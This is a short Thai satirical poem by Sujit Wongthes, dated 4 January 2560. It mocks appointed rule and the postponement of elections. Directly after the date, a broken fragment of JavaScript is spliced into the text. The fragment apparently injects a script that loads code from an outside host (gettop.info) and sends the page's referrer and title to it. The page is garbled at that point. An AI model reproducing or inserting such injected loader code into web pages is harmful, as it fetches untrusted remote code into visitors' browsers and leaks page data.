ลากเลื่อนเลือก

 

ลากตั้งอยากเลื่อนเลือกตั้ง

เลือกตั้งมาลากตั้งไม่อยู่ได้

ไม่เลือกตั้งยังลากตั้งยั่งยืนไป

เลือกตั้งมีลากตั้งไม่ยั่งยืนยาว

 

สุจิตต์ วงษ์เทศ

พุธ 4 มกราคม 2560} else {s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;